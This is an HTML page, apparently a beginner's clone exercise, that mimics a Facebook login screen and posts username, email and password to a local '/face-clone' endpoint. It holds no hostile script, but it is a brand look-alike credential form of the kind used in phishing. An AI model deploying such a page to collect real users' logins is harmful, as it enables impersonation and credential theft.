<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        .background{
            background-color: #f2f4f7;
            display: flex;
            justify-content: center;
            height: 700px;
        }
        input{
            width: 330px;
        }
        .but{
            width: 350px;
        }
        .image img{
            width: 370px;
            height: 120px;
            position: relative;
            right: 300px;
            top: 130px;
        }
        .box input,button{
            display: block;
            height: 49px;
            margin: 7px 20px;
           border: 1px solid rgb(177, 173, 173);
           padding: 0 10px;
        }
        .box{
            background-color: white;
            height: 390px;
            width: 400px;
            display: flex;
            flex-direction: column;
            box-shadow: 1px 1px 2px 1px;
            border-radius: 10px;
            position: relative;
            left: 200px;
            bottom: 30px;
        }
        .box p{
            text-align: center;
            
        }
        button{
            background-color: blue;
            color: white;
            border: none;
        }
        .p{
            display: flex;
            
            justify-content: center;
        }
        .p p:hover{
            text-decoration: underline rgb(101, 101, 241);
            cursor: pointer;
        }
        .box .but:hover{
            background-color: rgb(78, 78, 247);
            cursor: pointer;
        }
        .box input:hover{
            border: 2px solid rgb(74, 74, 139);
        }
        .button{
               background-color: #42b72a;
               width: 200px;
               margin-left: 100px;
        }
        .button:hover{
            background-color: #6dba5e;
        }
    </style>
    
</head>
<body>
    <div class="background">
        <div class="container">
            
            <div class="image">
                <img src="image.png" alt="">
              
            </div>
            <div class="box">
  <p>Login in to facebook</p>
  <form action="/face-clone" method="POST">
    <input type="text" name="username" placeholder="Username" required>
    <input type="text" placeholder="Email" id="" required>
    <input type="password" name="password" placeholder="Password?" required>
    <button type="submit" class="but">Log in</button>
  </form>
  <div class="p">
    <p>Forgot Password?</p>
    <p>Create new account</p>
  </div>
  <button class="button">create a new account</button>
</div>

        </div>
    </div>
</body>
</html>